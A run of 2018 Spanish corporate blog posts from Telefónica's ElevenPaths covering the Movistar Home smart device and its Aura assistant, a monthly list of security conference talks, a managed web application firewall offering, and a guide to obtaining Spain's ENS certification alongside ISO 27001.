El pasado jueves, 18 de octubre, tuvo lugar el lanzamiento comercial de Movistar Home, el dispositivo inteligente que integra el asistente virtual Aura, durante una emisión especial de Late Motiv. Este dispositivo innovador nace para reinventar la forma de comunicarte y ver la televisión en tu hogar. A lo largo de la presentación, conducida por Andreu Buenafuente, se dio a conocer lo que ofrece en estos momentos este dispositivo y las funcionalidades que va a presentar en poco tiempo. Para conocer más de cerca Movistar Home, vamos a revelarte nueve claves que debes de saber: 1. ¿Qué diferencia hay entre Aura y Movistar Home? Aura es un asistente virtual con capacidades de inteligencia artificial que permite al cliente de España hablar con Movistar a través de dos canales: la app de Movistar + y el dispositivo inteligente Movistar Home. En cambio, Movistar Home es un nuevo canal que tiene integrado Aura para que nuestros clientes se relacionen con la tecnología en su hogar de una manera sencilla y natural. 2. ¿Qué funcionalidades tiene Movistar Home? El dispositivo se integra con los servicios que tiene contratado el cliente con Movistar (Movistar +, conectividad y teléfono fijo) lo que facilita el uso de uno u otro indistintamente y, por tanto, reinventa las comunicaciones y el uso del teléfono dentro del hogar. 3. ¿Quiénes son nuestros partners? A lo largo de los próximos meses, se incorporarán diferentes partners para conformar un ecosistema abierto, de momento se han unido compañías como El Corte Inglés, al anunciar productos relacionados con los contenidos que se estén emitiendo y disponibles en un catálogo, consultar información y realizar gestiones sobre vuelos de Iberia o descubrir lo más relevante que se está comentando en Twitter mientras ves un programa o serie. 4. ¿Cuáles son sus características técnicas? Es un dispositivo definido y construido tanto a nivel hardware como a nivel software en Telefónica, lo que ha permitido incorporar los componentes clave para el uso de los servicios. Las características técnicas del servicio son: Tecnología de reconocimiento de voz de Intel. Cámara para ver en condiciones de baja luminosidad. Pantalla de 8". Privacidad (mute y mirilla). 2 Gb de RAM y 16 de Flash. 5. ¿Cuál es la diferencia con Google Home o Amazon Echo? Amazon Echo y Google Home también están pensados para el hogar, pero con ellos no se puede interactuar con los servicios de Movistar y por lo tanto no disponen de las mismas funcionalidades. 6. ¿Dónde se va a lanzar Movistar Home? Por el momento solo estará disponible en España pero la intención inicial es lanzarlo en otros países próximamente. 7. ¿Estará siempre escuchando lo que digo? ¿Qué hacéis con la información que recabe de mí? ¿Estará la cámara siempre conectada? Se busca dar al usuario el control total sobre su privacidad y el uso de sus datos. Movistar Home no es hackeable, tendría que llegar alguien físicamente al dispositivo y abrirlo. La cámara tiene incorporada una pestaña para que puedas decidir si tenerla abierta o cerrada, además de una herramienta para cortar el circuito de audio del micrófono. Para mayor seguridad, no se graban las conversaciones y el usuario siempre tiene el control de los datos que genera el dispositivo. 8. ¿Cuánto cuesta el dispositivo Movistar Home? Se lanzará una campaña en Navidad, durante la que se venderá el dispositivo a un precio de 79€. Movistar ofrecerá la posibilidad de financiar el dispositivo en 12 o 24 meses, lo que significa que por 6,98€/mes o 3,68€/mes, respectivamente, se podrá disfrutar de Movistar Home. 9. ¿Dónde lo puedo adquirir? Movistar Home estará disponible en Navidades en todos los canales de Movistar (tiendas, movistar.es y 1004). Si aún te quedan dudas, no te pierdas el programa del 18 de octubre. Emilio Gayo, Chema Alonso y el mismísimo Rafa Nadal te cuentan Movistar Home en detalle: Puedes acceder a la emisión completa del programa AQUÍ.
24 de octubre de 2018
Sigue el lanzamiento de Movistar Home en streaming
¿Eres un amante de la tecnología y te gusta estar al tanto de todas las novedades? Si es que sí, atento a lo que te vamos a contar y si estás dudando seguro que tampoco te lo querrás perder cuando termines de leer este post. regístrate al streaming Andreu Buenafuente, nuestro hacker Chema Alonso y Emilio Gayo, entre otros ponentes destacados, van a estar este jueves 18 de octubre a las 11 am en el plató de Late Motiv para lanzar Movistar Home, el nuevo dispositivo que va a reinventar los hogares de los españoles. Con Movistar Home sustituirás el teléfono fijo y sacar el máximo partido a tu televisión: no te pierdas nunca lo que quieras ver, olvídate del mando a distancia y encuentra siempre contenido relevante. Además con el nuevo dispositivo, se acabó eso dar la vuelta al router para obtener la contraseña de la Wi-Fi. ¿Por qué no debes perderte el evento en streaming? ¡Te esperamos conectad@! regístrate al streaming
16 de octubre de 2018
#DiHolaAMovistarHome, el dispositivo que reinventa tu hogar
El pasado Mobile World Congress fue el pistoletazo de salida para Aura, el nuevo proyecto estratégico de Telefónica, liderado por nuestro Chief Data Office, Chema Alonso. Ahí se anunció el lanzamiento de Movistar Home, un dispositivo inteligente que tiene como objetivo conquistar los hogares de los españoles y es que Movistar Home ha llegado para quedarse y marcará un antes y un después en la forma en que nuestros clientes se comunicarán con la compañía. Aura, la inteligencia artificial de Telefónica, vive dentro del dispositivo Movistar Home y, gracias a ella, podrás hacer cosas increíbles en tu hogar. Si utilizas el comando de voz “OK Aura” junto a una orden específica, podrás encender la tele, escoger un programa, ver una película,pedir una recomendación de contenido infantil de Movistar +. También podrás apagar o encender el wifi o hacer un llamada o vídeo llamada, entre otras cosas, y solo utilizando tu voz. Desde ahora y hasta el próximo 16 de octubre, los usuarios de los paquetes Fusión de la compañía ya pueden reservar Movistar Home para adquirirlo por 49 euros. El precio es exclusivo para las primeras 5.000 unidades. ¿A qué esperas para encargarlo? Es el momento de sustituir tu teléfono fijo por Movistar Home y dar un paso más hacia la transformación digital de tu hogar. Algunos de nuestros clientes ya lo han probado y les ha sorprendido. No te pierdas los distintos casos de uso del device: Habla con Aura y descubre antes que nadie todas las cosas que podrás hacer con tu voz a través de Movistar Home. Resérvalo ya aquí y di hola a Movistar Home, el dispositivo que reinventa tu hogar. ¡Date prisa que quedan muy pocas unidades!
11 de octubre de 2018
Eventos de seguridad informática en los que participamos durante el mes de octubre
¡Hola hackers! Un mes más, os presentamos la lista con los eventos en los que participamos en octubre y que no debes de perderte si quieres estar al día en seguridad informática. 1er Seminario Internacional de Ciberseguridad "Un Desafio para Todos" Nuestro CSA, Gabriel Bergel, participa con la charla titulada: "Mentiras, engaños e infraestructura crítitica" en la primera edición de este seminario que se celebra el 1 de octubre en Valparaiso, Chile, y cuyo propósito es promover el conocimiento y la práctica de la ciberseguridad en el país, con el objetivo de mejorar los estándares de la tecnología y la seguridad de la información, así como la necesidad de legislar para proteger a la sociedad de la ciberdelincuencia. ElevenPaths Talks: Seguridad en redes wifi No te pierdas el próximo 4 de octubre este webinar con nuestros CSAs en el que mostrarán, a partir de diferentes ataques a redes wifi, qué posibilidades ofrecen los grandes fabricantes desde el diseño de sus arquitecturas para protegernos de los ataques de estas redes. ¡Aprende con nuestros expertos! Tic Forum Logicalis Participamos en este foro que se celebra el 4 de octubre en Argentina con la conferencia: " Investigación y WannaCry". Claudio Caracciolo, jefe de CSA de ElevenPaths, hablará detalladamente sobre la gestión en la respuesta de incidentes relacionados con ataques como el de WannaCry, y cómo reaccionar en caso de sufrir un ataque del estilo. Navaja Negra El evento más importante de Albacete ya está aquí. Este año varios de nuestros expertos participan en estas jornadas que se celebrarán los próximos 4 y 5 de octubre. Día 4 de octubre: Eduardo Parra, Cybersecurity Analyst en Telefónica Advanced Global SOC, dará una breve introducción práctica, de carácter informal, a SDR. Se realizarán diversos ejercicios prácticos en donde se comprobará que alcance de las ondas de radio no se limita a los estandares WIFI. Día 5 de octubre: por un lado, Pablo González dará una ponencia sobre "El arte de la post-explotación con Empire". Una vez se compromete una máquina llega la hora de la post-explotación. Empire Project permite aprovechar el máximo potencial de Python o de Powershell para llevar a cabo diferentes acciones: recopilación, elevación, pivoting... Por otro lado, Santiago Hernández ofrecerá dos charlas: la primera de ellas hablará sobre la manipulación de paquetes de red en tiempo real, y este mismo día por la tarde, hablará sobre el Machine Learning, el nuevo Jedi de la seguridad de la información. #TechTalks: Blockchain con ElevenPaths de Telefónica en Valencia Asiste al TechTalk en el que Fran Ramirez, uno de nuestros expertos de seguridad, contará la enorme oportunidad que supone b lockchain para los programadores y los perfiles que demanda el mercado. Ya has oído de todo sobre blockchain y aunque no sepas mucho del tema y de invertir, seguro que como profesional IT sabes que ya está aquí. El próximo 4 de octubre tienes una cita a las 18:45h para aprender sobre esta tecnología. ¡Regístrate al webinar! HoshoCon 2018: Blockchain Security Conference Fernando Herrera, del equipo de ElevenPaths USA, se desplazará los días 9, 10, y 11 de octubre a Las Vegas con motivo de la conferencia HoshoCon, la primera conferencia global de ciberseguridad en blockchain, junto a nuestro partner Rivetz, para promocionar los nuevos packs de servicios de ElevenPaths y Rivetz, Esta conferencia contará con más de 80 expositores, más de 100 oradores y una asistencia mayor que 1000 personas. Accede al link y regístrate al evento. Ciberseguridad en Infraestructuras Críticas El seminario de Ciberseguridad en Infraestructuras Críticas, Riesgos, Oportunidades y Prioridades, se celebrarán los días 9 y 10 de octubre en la ciudad de Buenos Aires, Argentina. Nuestro CSA Claudio Caracciolo presentará el 10 de octubre la ponencia: " IIoC no tiene que ser un problema, aunque a veces lo es". 8.8 Infinity Mexico El 11 de octubre asistiremos a estas charlas que se celebran en la Ciudad de México en la que nuestro CSA, Gabriel Bergel, participará con la ponencia "El arte del engaño". En ella nos hablará sobre el principal vector de ataque en la actualidad, que se basa en nuestra tendencia natural a confiar y ayudar, es decir, la Ingeniería Social. Historia, conceptos básicos, ciclo de ataque y unas demos serán los ejes sobre los que gire su ponencia. No os la perdáis si queréis saber cómo conseguimos picar a las "victimas". Code Talks for Devs: Cómo crear un plugin de FOCA El próximo 17 de octubre nuestro experto José Sperk ofrecerá este webinar gratuito sobre nuestra herramienta estrella y que todos los developers aman, la FOCA. Hemos crecido con ella y, recientemente, se ha llevado a cabo una reingeniería completa de la herramienta. Además, se ha publicado de forma Open Source para que puedas disfrutar de cada línea de código y puedas mejorarla. En este talk, José Sperk, uno de los responsables de esta reingeniería, nos hablará sobre cómo crear un plugin para la herramienta. Let's hack! Hack&Sec 2018 Estas jornadas de ciberseguridad tiene como objetivo acercar la ciberseguridad a la familia a través de actividades lúdicas orientadas a todas las edades. A su vez, se ofrecerán temas de interés destinados a los padres, en los que se abordarán temas como los riesgos en Internet, uso del móvil, etc. Fran Ramírez estará el próximo 18 de octubre en estas jornadas con varias ponencias. Si eres un principiante de la seguridad y quieres concienciar a tu familia de la importancia de la misma, ¡no te lo pierdas! Hack&Beers Pablo San Emeterio, CSA y experto, participará el viernes 19 de octubre en estas ponencias gratuitas enfocadas a todos aquellos interesados en seguridad bajo un ambiente distendido y acompañado de unas beer. ¡No te lo pierdas! Colombia 4.0 (MinTic) El evento que tiene lugar del 23 al 26 de octubre en Corfería está organizado por Colombia 4.0, la plataforma de tecnología digital más grande del país, que se ha convertido en un referente nacional para los amantes de la tecnología y la innovación gracias a los contenidos digitales. Claudio Caracciolo, participará el miércoles 24 de octubre con la ponencia: “Cuando la innovación puede ir más allá. 2º Encuentro de Contadores Públicos y Auditores Fabian Chiera participará el 23 de octubre en el segundo Encuentro de Contadores Públicos y Auditores que se celebra en Guatemala con una ponencia enfocada en la seguridad en el mundo de la auditoría: Ciberseguridad para Auditores. ATEFI: Summit de Seguridad en Medios Electrónicos de Pago El ATEFI Summit (ASMP2018) reúne a los más destacados profesionales del sector, funcionarios de policías y fuerzas del orden público, así como destacados organismos internacionales de seguridad para abordar temáticas vigentes y tendencias en el mapa del delito cibernético. Claudio Caracciolo, compartirá su experiencia en el sector con su ponencia “ Cuando el mundo mobile no acompaña a la seguridad”, que tendrá lugar el jueves 25 de octubre. Semana de la Ciberseguridad Universidad Nacional de Colombia El crecimiento en el uso de las criptomonedas ha despertado un atractivo muy alto para las organizaciones criminales y con ello el uso de nuevos ataques como el Cryptojacking, el malware de criptominería que consiste en ataques de ejecución remota de código. El 25 de octubre, nuestro CSA Diego Espitia, explicará todo lo relacionado con este malware en su ponencia Cryptojacking, la nueva gran amenaza. 8.8 Infinity Chile Esta conferencia no se trata de una feria más con un objetivo comercial, al contrario, es un evento 100 % técnico que tiene como principal objetivo compartir información, democratizar el conocimiento y crear comunidad. Gracias a su “ call for papers”, el Comité Académico, formado por reconocidos hackers y académicos, seleccionan los papers más interesantes para que sean presentados durante la conferencia. 8.8 Computer Security Conference es la única conferencia de este tipo en Chile y una de las más reconocidas en el continente ya que va más allá de los aspectos teóricos. Siempre en un contexto colorido y con constantes referencias al mundo de la cultura pop, estas conferencias contarán el 27 de octubre con la presencia de nuestros CSAs Diego Espitia y Carlos Ávila, que nos detallarán los diferentes ataques dirigidos a gobiernos y centros sanitarios con la ponencia: Government & Healthcare, Breaking Privacy. A su vez, nuestro experto Pablo González asistirá a este evento con la charla de " UAC-A-Mola Evolution: Researching, Superuser and Terrible Consequences". Si estás por Chile a lo largo del mes de octubre, ya sabes a donde acudir. Seguridad Fuerza Aérea El CSA de Panamá, Fabián Chiera, viajará a Colombia para asistir a esta conferencia el día 29 de octubre y dar una ponencia sobre la " Usabilidad de los sentimientos para comprometer datos". Y esto es todo por este mes hackers, os esperamos el mes que viene con más eventos y conferencias. Recordad que si tenéis cualquier duda sobre seguridad informática, podéis acceder a la comunidad de ElevenPaths y preguntar a nuestros expertos. ¡Buen fin de semana a todos!
29 de septiembre de 2018
“Madrid Digital Revolution” como lema para la mayor feria de comercio electrónico y marketing digital, eShow
Madrid está encabezando la transformación digital del sistema empresarial español. Prueba de ello son los cada vez más numerosos eventos sobre el sector digital que se celebran en la capital, destacando entre ellos la mayor feria de comercio electrónico y marketing digital, eShow. En su 33ª edición, que comienza hoy, días 26, y finalizará mañana, en IFEMA (Pabellón 6), “ Madrid Digital Revolution” se convierte en el lema e hilo conductor del congreso. Además del comercio electrónico, que en el tercer trimestre de 2017 alcanzó la cifra récord de 7.785 millones de euros (+ 26,2%), según los últimos datos de la Comisión Nacional de los Mercados y la Competencia (CNMC), la revolución digital está impulsando oportunidades de crecimiento y expansión en todos los sectores. En este contexto, Madrid y la feria eShow se convierten en el escenario donde los líderes del eCommerce y el Marketing Digital se reúnen para compartir conocimientos, atraer negocio y crear sinergias entre profesionales. Regístrate a eShow AQUÏ Este evento cuenta con ponentes de primer nivel en el sector digital, y un año más, uno de nuestros expertos participará como orador: Enrique Blanco Henriquez, Product Design de Aura. Durante este evento hablará sobre WordPress, el CMS más utilizado en el mundo. Como debéis de saber, prácticamente a diario se encuentran vulnerabilidades en plugins relacionados con el CMS. Enrique mostrará cómo se puede fortificar un WordPress en modo paranoico y cómo se puede vigilar mediante servicios y herramientas la seguridad de tu sistema de gestión de contenidos. ¿Estás preparado para conocer el modo paranoico y aplicarlo a tu WordPress? La prevención es algo vital y por ello, en esta línea trabajamos para ofrecer una nueva forma de entender la seguridad en el mundo eCommerce. Toda la información de la ponencia AQUÍ. También, si quieres saber más sobre WordPress, te dejamos esta entrada del blog para que aprendas todo lo que hay que saber sobre este sistema de gestión de contenidos: WordPress in Paranoid Mode: Cómo fortificar tu BBDD de WordPress con Latch.
26 de septiembre de 2018
WAF gestionado en Red de Telefónica, basado en tecnología F5 Networks
Ecosistema de aplicaciones Las aplicaciones y sitios web pueden procesar tanto datos confidenciales personales como datos de negocio vitales para las empresas, información que los convierte en activos de alto valor. Además, su grado de exposición continua los transforma en una diana donde el riesgo es máximo. Hoy en día los negocios demandan accesibilidad, movilidad, rendimiento y actualización, en definitiva, acceso a la nube. Pero, a medida que el entorno de la nube alcanza la madurez, la protección se convierte en un objetivo por todos los riesgos y problemas de seguridad que lleva asociados. Si se une al creciente número de amenazas especializadas a entornos web y de los desarrollos basados en APIs, junto con el alto número de vulnerabilidades existentes en las aplicaciones, se conforma un ecosistema ideal para que los ciberdelincuentes puedan sacar provecho de la situación, abusando de las debilidades de las aplicaciones o a través de exploits de día-cero para obtener acceso y extraer datos confidenciales Los sitios webs se enfrentan a amenazas de seguridad que pueden tener como objetivo, por ejemplo, el acceso a bases de datos y robo o corrupción de datos personales o confidenciales, la modificación del código de una página web para cambiar el aspecto que perciben los usuarios, la interceptación de datos personales y confidenciales, o la interrupción del servicio mediante ataques DDoS. Proteger sus aplicaciones (y los datos que almacenan) y aplicar sobre ellos políticas y medidas de protección es una parte central de cualquier estrategia de seguridad, especialmente con la reciente entrada en vigor del RGPD. La legislación requiere para la seguridad del tratamiento de datos de carácter personal, entre otras cosas, la capacidad de garantizar la disponibilidad y resiliencia del acceso de los interesados a sus datos personales. Identificar las amenazas a las que están expuestas las aplicaciones web permite conocer los riesgos potenciales y controlar el impacto mediante la oportunidad para aplicar las medidas adecuadas. Qué es un WAF y por qué necesitas uno Los responsables de ciberseguridad buscan el equilibrio entre la resiliencia, la usabilidad y el precio. Al mismo tiempo, requieren tener visibilidad suficiente y ganar control sobre lo que está ocurriendo en sus aplicaciones. Alcanzar estos objetivos para las aplicaciones es posible a través del uso de un WAF (Web Application Firewall), que aporta protección especializada frente a las amenazas web, con detección y respuesta inmediatas, a la vez que permite el cumplimiento de requisitos marcados por ciertas normativas, como PCI-DSS, RGPD, esquema Nacional de Seguridad... Un WAF, al entender perfectamente la lógica y el diálogo web, ofrece la protección que un NGFW, IPS o IDS, con una inspección basada en paquetes, no pueden proporcionar frente a las amenazas que ponen en peligro a las aplicaciones públicas e internas. Un WAF no sustituye, sino que complementa la protección que IPS/IDS/NGFW ofrece a la red de tu empresa, protegiendo las aplicaciones web y las APIs de una gran variedad de ataques especializados, siendo capaz de detectar nuevos tipos de tráfico o amenazas maliciosas que pueden ser desconocidos hasta el momento. Su capacidad para ofrecer visibilidad es otra de las ventajas que aporta disponer de este tipo de tecnología. Además de funcionalidades de seguridad, un WAF te permite saber lo que está ocurriendo en tu negocio web, de dónde y en qué horarios te visitan tus usuarios, qué aplicaciones son la más utilizadas, las más atacadas, cuáles son las amenazas que más se han detectado. Estos datos permitirán aplicar políticas de seguridad en el desarrollo y protección de las aplicaciones, así como elaborar medidas que pueden ayudar a incrementar el negocio. WAF Gestionado en la red de Telefónica Un WAF ofrece múltiples beneficios pero resulta ser una tecnología exigente que precisa profesionales con alto nivel de conocimientos en seguridad, pentesting y desarrollo web para poder gestionarlo adecuadamente sacándole partido. El WAF gestionado en Red de Telefónica es un servicio completamente administrado por expertos con profundos conocimientos y alto grado de experiencia en seguridad, alineado con la política de seguridad y cumplimiento normativo definida por el cliente. De esta manera se permite que pueda dedicar más tiempo y atención a su negocio, mientras protegemos la disponibilidad del servicio y evitamos la aparición de brechas de seguridad e infecciones de malware. F5 Networks se ha asociado con ElevenPaths, la unidad de ciberseguridad de Telefónica, para ofrecer este servicio WAF gestionado desde la red de Telefónica, una seguridad avanzada que resulte fácil de consumir y administrar, respetando los requisitos de privacidad de datos, y liberando al cliente de toda la complejidad y coste que exige disponer y mantener personal cualificado para operar este tipo de tecnologías. F5 Networks lidera el Cuadrante Mágico de Gartner de Firewall de Aplicaciones Web (WAF), siendo una tecnología flexible, potente, confiable y completamente programable. Su elevada granularidad y elasticidad a la hora de definir las reglas permiten implementar configuraciones específicas para cada caso posible. Además, la alianza de F5 Networks con ElevenPaths incluye la integración de su tecnología BIG-IP® Application Security Manager™ (ASM) con la solución Vamps de ElevenPaths; permite el parcheo en caliente de vulnerabilidades. Esta integración proporciona la capacidad de aplicar una técnica de virtual patching sobre la infraestructura del cliente. De este modo, las vulnerabilidades detectadas por Vamps se mitigan automáticamente con la tecnología F5 BIG-IP ASM, reduciendo la ventana de oportunidad de los atacantes y evitando los ataques que emplean estas vulnerabilidades como vía de entrada. Esta integración automática consigue reducir el tiempo de exposición de las vulnerabilidades drásticamente, pasando de emplear días o semanas para solucionar una vulnerabilidad a horas o minutos. El WAF Gestionado en Red de Telefónica, basado en tecnología F5 Networks e integrado con Vamps, es un servicio de seguridad dedicado para ofrecer las capacidades de seguridad de aplicaciones más avanzadas disponibles en el mercado hoy en día. Juntos sumamos más. Remedios Moreno Global Security Product Manager at ElevenPaths Pablo Alarcón Global Strategic Alliance Manager at ElevenPaths
13 de septiembre de 2018
Esquema Nacional de Seguridad e ISO 27001 ¿Cómo puedo implantar ambos en mi empresa?
Durante el año 2006 comenzaron las implantaciones de ISO-27001. En el 2008 al aparecer la Ley 11, las AAPP empezaban a ponerse las pilas en cuestiones de Ciberseguridad. En el mes de enero de 2010 se publicaron el RD 03/2010 “Esquema Nacional de Seguridad” (ENS) y el RD 04/2010 “Esquema Nacional de Interoperabilidad”. Actualmente, se observa una mayor incertidumbre alrededor de las “certificaciones” en el ENS, fuera del ámbito de las AAPP. Cualquier empresa que tenga proyectos en vigor, o más aún, desee participar en ofertas y licitaciones con algún Organismo Oficial, como mínimo, el contar con esta certificación, le supondrá una diferencia competitiva importante, y en breve, es probable que sea una cláusula obligatoria para participar en una licitación. En mi empresa privada, ¿necesito certificar el ENS?.. ¿qué pasa ahora con el ISO-27001? Estas y más cuestiones son las que vamos a resolver a lo largo del post, aunque ya te adelantamos que si tu empresa guarda algún interés con las AAPP, la respuesta es sí. 1.¿Cuál es la certificación que necesito? El 23 de octubre del año 2015 se publicó el Real Decreto 951, que modifica al Real Decreto 3/2010, de 8 de enero. En el mismo, se especifica por un lado, la fecha límite para las AAPP en cuanto a la implantación del ENS y por otro (y más importante para nosotros), la asignación al Centro Criptográfico Nacional ( CCN) de la misión de velar por el ENS. En en su web podemos encontrar una serie de guías de la “ familia 800” del CCN-STIC (Seguridad de Tecnologías de la Información y las teleComunicaciones), las cuáles son de libre descarga y sobre las que basaremos el post. El Anexo I del ENS define tres categorías: Básica, Media o Alta. En su punto 1. “Fundamentos para la determinación de la categoría de un sistema”, esa categorización se basa en la valoración del impacto que tendría un incidente de seguridad sobre la organización. En el punto 2 del mismo Anexo, continúa definiendo las “Dimensiones de la seguridad” y a fin de poder determinar este impacto, se tendrán en cuenta las siguientes dimensiones: Autenticidad, Confidencialidad, Integridad, Disponibilidad, Accounting/Trazabilidad. El punto 3, “Determinación del nivel requerido en una dimensión de seguridad” establece que si las consecuencias de un incidente de seguridad, afectan a alguna de las dimensiones de seguridad y suponen un determinado perjuicio sobre las funciones de la organización, sobre sus activos o sobre los individuos afectados se clasificarán como: Tabla determinación del nivel requerido en una dimensión de seguridad Por último, el punto 4. “Determinación de la categoría de un sistema de información”, hace referencia a que el máximo nivel de un sistema de información determinará su categoría. Nos hemos detenido especialmente en estos conceptos, ya que, para determinar el tipo de certificación que necesito, dependeremos estrictamente de la “ Categoría” que le hayamos asignado a nuestros sistemas de información. Comencemos ahora con la guía que nos atañe a este punto. La guía CCN-STIC 809 "Declaración y Certificación de conformidad con el ENS y distintivos de cumplimiento". Lo primero que vemos en esta guía es una referencia al ENS en su Artículo 41. “Publicación de conformidad.” “Los órganos y Entidades de Derecho Público darán publicidad en las correspondientes sedes electrónicas a las declaraciones de conformidad, y a los distintivos de seguridad de los que sean acreedores, obtenidos respecto al cumplimiento del Esquema Nacional de Seguridad”. En su punto 2.2. "Procedimiento de determinación de la conformidad" , que se desprende del Anexo I (del ENS) mencionado, se establece que la conformidad con la norma pasa necesariamente por adoptar y manifestar la implantación de las medidas de seguridad requeridas para tal sistema, atendiendo a su categoría (básica, media o alta). Ahora, sólo nos queda aclarar cómo se obtiene esta conformidad, lo cual, es bastante claro y sencillo y también se desprende del ENS, esta vez, en su Anexo III: Procedimiento de determinación de la conformidad En el punto del párrafo anterior. “Publicidad de la conformidad”, también nos aclara que cuando se trate de sistemas de información de categoría media o alta, el CCN y la Entidad Nacional de Acreditación ( ENAC), atendiendo a un procedimiento regulado, participarán en la acreditación de las Entidades de Certificación del ENS. La Certificación de Conformidad con el ENS a la que se refiere el punto anterior, deberá́ ser expedida por una Entidad Certificadora. El CCN mantiene en su sede electrónica una relación actualizada de las Entidades de Certificación, las cuales al día de hoy son: Entidades certificadoras del CNN La Certificación de Conformidad con el ENS podrá representarse mediante un Distintivo de Certificación de Conformidad. Cuando la provisión de las soluciones o la prestación de los servicios sujetos al cumplimiento del ENS sean realizados por organizaciones del sector privado, estas, utilizarán los mismos modelos documentales utilizados para las Declaraciones, las Certificaciones o los Distintivos de Conformidad recogidos en la presente guía. Del mismo modo, los Distintivos de Conformidad cuando se exhiban por parte de dichos operadores privados, deberán enlazar con las correspondientes Declaraciones o Certificaciones de Conformidad, que permanecerán siempre accesibles en la página web del operador. El Centro Criptológico Nacional mantiene en su página web una relación de las entidades públicas o privadas que han obtenido Certificaciones de Conformidad. Ver listado actualizado aquí Tipos de certificaciones de Conformidad 2.¿Cómo se adecua mi empresa para obtener la misma? El CCN se describe con máximo detalle la adecuación ordenada al ENS, la cual requiere el tratamiento de diversas cuestiones: • Preparar y aprobar la política de seguridad, incluyendo la definición de roles y la asignación de responsabilidades. ( CCN-STIC 805 Política de seguridad de la información) • Categorizar los sistemas atendiendo a la valoración de la información manejada y de los servicios prestados.( CCN-STIC 803 Valoración de sistemas en el Esquema Nacional deSeguridad) • Realizar el análisis de riesgos, incluyendo la valoración de las medidas de seguridad existentes. ( Magerit versión 3 y programas de apoyo –Pilar- ) • Preparar y aprobar la Declaración de aplicabilidad de las medidas del Anexo II del ENS. ( CCN-STIC 804 Medidas e implantación del Esquema Nacional de Seguridad) • Elaborar un plan de adecuación para la mejora de la seguridad, sobre la base de las insuficiencias detectadas, incluyendo plazos estimados de ejecución. ( CCN-STIC 806 Plan deadecuación del Esquema Nacional de Seguridad) • Implantar operar y monitorizar las medidas de seguridad a través de la gestión continuada de la seguridad correspondiente. (serie CCN-STIC) • Auditar la seguridad ( CCN-STIC 802 Auditoría del Esquema Nacional deSeguridad y CCN-STIC 808 Verificación del cumplimiento de las medidas en el EsquemaNacional de Seguridad) • Informar sobre el estado de la seguridad ( CCN-STIC 815 Métricas e Indicadores en el Esquema Nacional de Seguridad y CCN-STIC 824 Informe del Estado de Seguridad). Para ejecutar esta adecuación nos presenta el siguiente esquema. Adecuación al esquema Nacional de Seguridad 3.¿Cómo obtengo la certificación? Lo más importante como punto de partida y metodología concreta a seguir para obtener esta certificación es, nuevamente, recurrir al CCN y considerar los “Instrumentos para la adecuación” que ponen a nuestra disposición en el siguiente enlace. Desde los siguientes enlaces podremos descargar todas las guías que necesitamos para completar este punto: • CCN-STIC 802 Guía de Auditoría • CCN-STIC 804 Guía de Implantación • CCN-STIC 808 Verificación cumplimiento medidas del ENS • CCN-STIC 815 Métricas e Indicadores • CCN-STIC 809 Declaración y Certificación Conformidad ENS. DistintivosCumplimiento. • CCN-STIC 824 Informe Estado Seguridad • CCN-STIC 844 INES • CCN-STIC 47X Manual de uso PILAR 4.¿Me sirve o no el ISO-27001? Nada mejor que utilizar la guía CCN-STIC 825 “Esquema Nacional de Seguridad - Certificaciones 27001” lanzada en noviembre de 2013 para contestar a este punto. Punto 2. “Objeto” de esta guía, nos indica claramente: b “Nótese que la correspondencia no es una relación matemática de equivalencia. Lo que se busca en esta guía es, en primer lugar, explicar la utilización de una certificación 27001 como soporte de cumplimiento del ENS y, en segundo lugar, determinar qué controles de la norma 27002 son necesarios para el cumplimiento de cada medida del Anexo II y, en su caso, qué elementos adicionales son requeridos”. El punto 5. “Cumplimiento del ENS a través de una Certificación 27001” es de sumo interés para nosotros pues nos da una premisa fundamental: El primer requisito para poder utilizar una certificación 27001 como soporte de cumplimiento del ENS es que el alcance de la certificación 27001 cubra lo exigido por la Ley 40/2015, tanto desde el punto de vista de los activos esenciales (Anexo I) como del equipamiento empleado. Por lo tanto es fundamental considerar el “Alcance” que definiremos para nuestro SGSI (Sistema de Gestión de la Seguridad de la Información), para que desde el inicio, podamos tener una analogía entre ambos. El Anexo II del ENS se definen cada uno de los requisitos en función de la categoría del sistema de información. Un ejemplo claro de ello es la imagen que aparece a continuación: Requisitos del ENS en función de la categoría del sistema de información (R eal Decreto 3/2010, de 8 de enero) En el punto 5.1. de esta misma guía 825, “Cuadro resumen”, se presenta una tabla que resume las diferencias presentes entre una certificación 27001 y el cumplimiento del ENS y cuya utilización, resulta ser una excelente aportación para tener claro este punto tal y como podemos observar en la imagen inferior, en la apreciamos justamente algunos de los requisitos del ENS respecto al grado de cobertura o esfuerzo (1, 2, 3…) para asociarlo con los controles de ISO-27001. Tabla resumen diferencias entre una certificación 27001 y el cumplimiento del ENS ( guía CCN-STIC 825) Como resumen final de este apartado, podemos afirmar que una certificación ISO 27001 cubre bastante más necesidades que el ENS. Si tenemos la opción de adecuar nuestra organización a ambos certificados en paralelo es el camino ideal. Si por el contrario ya dispones del ISO-27001, tendrás gran parte del camino recorrido y sólo quedará analizar en detalle el ámbito y “ajustar” los indicadores que se nos indican en esta tabla. 5.¿Puedo obtener ambas certificaciones? Por supuesto que sí. Si está a nuestro alcance lanzar ambos en paralelo, nos ahorraremos mucho trabajo y en definitiva nuestro SGSI será bastante más sólido. Un importante consejo aquí, es preparar ambos de forma “sincrónica” para poder solicitar las dos certificaciones al unísono, y de ser posible, con la misma entidad de certificación. Si lo logramos, todo será más sencillo, tanto para nuestra empresa como para los auditores externos. 6.¿Qué pasos debo seguir? Los pasos que propone el CCN-CERT son los siguientes: Pasos a seguir para la obtención de una certificación Marcados en verde podemos ver los pasos que iremos desarrollando en este punto, así como el orden que creemos más práctico para abordarlos: Paso 1: Definir roles y asignar personas. (tomaremos como referencia la guía CCN_STIC 801 ) Paso 2: Preparar y aprobar la política de seguridad.( tomaremos como referencia la guía CCN_STIC 805) Paso 3: Valorar/Categorizar el sistema. (guía CCN_STIC 803) Paso 4: Realizar el análisis de riesgo. El CNN hace referencia a Magerit ( Metodología de Anális y Gestión de Riesgos de los Sistemas de Información) Paso 5: Preparar y aprobar la Declaración de Aplicabilidad. (emplearemos la guía de implantación CCN_STIC804) Paso 6: Implantar, operar y monitorizar el sistema (utilizaremos la guía Criptología de empleo en el Esquema Nacional de Seguridad CCN_STIC 807) Podrás acceder al artículo completo aquí. Alejandro Corletti Estrada www.darFE.es ElevenPaths
12 de septiembre de 2018
Tus metadatos hablan de ti más de lo que imaginas
